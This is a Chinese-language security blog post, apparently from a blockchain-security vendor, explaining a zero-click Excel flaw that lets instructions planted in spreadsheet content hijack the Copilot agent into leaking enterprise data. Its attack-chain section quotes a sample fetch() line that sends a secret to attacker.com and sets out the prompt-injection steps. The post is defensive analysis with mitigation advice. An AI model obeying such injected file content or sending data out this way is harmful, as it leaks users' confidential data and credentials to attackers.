“Excel变内鬼”:零点击劫持Copilot,企业数据被AI自动“送走”的新型高危漏洞深度解析
🧠 一、事件本质:传统漏洞 + AI Agent = 全新攻击范式
近期最受关注的漏洞 CVE-2026-26144,是微软在 2026 年 3 月补丁中修复的高危问题,被评为严重等级漏洞。
该漏洞本质属于 Excel 中的输入未正确净化(Improper Neutralization)导致的XSS问题,但真正的危险来自它与 Copilot Agent 的结合,使其成为AI驱动的数据窃取攻击。
微软官方说明指出,攻击者可以操控Copilot代理,通过非预期网络路径泄露数据,并且实现零点击攻击。
攻击范式已经发生变化:
👉 从“攻击用户” → “操控AI代理执行攻击”
核心特征如下👇
⚠️ 零点击(Zero-click)
⚠️ 无需权限提升
⚠️ AI作为执行主体
⚠️ 合法流量完成数据外泄
🔗 二、攻击链拆解(从Excel到数据外泄全过程)
Step 1️⃣:恶意Excel构造
攻击者构造包含恶意输入的 Excel 文件,本质是将 payload 混入正常数据结构中
这些内容可能嵌入:
单元格
公式
预览渲染数据
Step 2️⃣:Copilot Agent自动解析
当文件被系统处理(甚至只是预览)时:
Copilot读取Excel上下文
AI无法区分数据与指令
恶意语义被当作“任务”执行
👉 这是典型 Prompt Injection 攻击路径
已有研究表明,LLM系统在这种“指令污染”场景下极易被诱导执行越权操作
Step 3️⃣:AI触发外部通信
漏洞允许恶意输入影响AI行为,例如:
fetch("https://attacker.com/leak?info=" + encodeURIComponent(secret))
实际执行逻辑并不依赖浏览器,而是:
AI理解“发送数据”的语义
Copilot主动发起请求
使用合法网络能力绕过安全检测
该漏洞可以让攻击者“利用AI代替自己发请求”
Step 4️⃣:零点击数据外泄
攻击成立关键在于:
👉 用户无需点击,仅预览或自动处理即可触发
攻击者可以窃取:
📊 Excel业务数据
🔐 凭证与Token
📂 企业内部信息
最终由 Copilot 发送到外部服务器,实现静默数据泄露
🧬 三、漏洞核心技术根因(专业视角)
1️⃣ 输入净化失败(XSS根因)
Excel 未正确过滤输入内容:
Improper Neutralization of Input
导致恶意内容可被解析并执行,从而形成基础攻击入口
2️⃣ Prompt Injection + AI执行链
传统攻击:
XSS → 浏览器执行
现在演变为:
XSS → AI理解 → AI执行 → 数据外发
👉 攻击执行者从“代码”变成“AI代理”
3️⃣ 信任边界崩塌
Copilot具备高权限能力:
读取本地文件
访问企业数据
发起网络请求
但输入却来自外部不可信内容
形成链路:
外部输入 → AI → 内部数据 → 外部泄露
👉 典型 Trust Boundary Collapse(信任边界崩塌)
4️⃣ 零点击触发机制
该漏洞最大突破点:
👉 无需用户交互即可触发攻击
甚至在:
邮件预览
文件索引
AI摘要生成
阶段就可能被触发
🧪 四、为什么这次攻击“质变”
对比传统Office漏洞:
维度传统漏洞Copilot漏洞
触发方式点击/宏❌ 零点击
执行主体用户🤖 AI
行为特征异常明显👻 极隐蔽
数据出口本地🌐 AI外发
本质变化:
👉 攻击者不再直接攻击系统,而是操控AI成为攻击代理
🧨 五、企业级风险评估
🎯 成功率:极高
Excel是企业核心工具,传播路径极广
🎯 检测难度:极高
请求来自合法Office进程
无宏、无木马
🎯 影响范围:灾难级
财务数据泄露
商业机密外流
凭证泄露导致横向攻击
👉 本质:AI成为“合规的数据外传通道”
🛡️ 六、防御建议(专业实践)
🔒 限制Copilot能力
禁止访问敏感数据域
限制自动执行行为
🌐 出站流量控制
阻止Excel访问未知外部地址
监控异常HTTP请求
🔍 输入隔离
if input_source == "external": sanitize_or_block()
⚙️ 及时打补丁
微软已在 2026 年 3 月更新中修复该漏洞,需优先部署
🧱 临时措施
禁用Copilot Agent
关闭预览功能
🧩 七、趋势判断:AI安全进入“0-click时代”
该漏洞释放出一个关键信号:
👉 攻击目标正在从“人”转向“AI代理”
演进路径:
宏病毒 → 浏览器漏洞 → XSS → Prompt Injection → AI Agent攻击
未来趋势:
🤖 自动化AI攻击链
🧠 AI驱动数据窃取
🕵️ 无文件攻击(Fileless AI Attack)
🎯 结语(专业判断)
这不是一个普通漏洞,而是一次安全范式跃迁
👉 攻击对象从“系统执行层”上移到“AI决策层”
未来真正的安全核心将变成:
👉 如何防止AI被攻击者“利用来攻击你自己”
ChainSafeAI(链熵科技)专注于区块链生态安全,以“数据驱动 + 技术赋能”构建360°全方位安全防护体系,服务于交易所、金融机构、OTC服务商及加密资产投资者。
公司提供覆盖KYT风险监测、智能合约审计、加密资产追踪、区块链漏洞测试等在内的全维度安全与合规技术解决方案,助力客户防范洗钱、诈骗等风险,保障业务合规运行。
通过实时风险预警、合规审查与资金溯源分析,协助客户识别链上异常行为、防范洗钱及诈骗风险、降低被盗损失并提升资产追回可能性。
更多推荐


所有评论(0)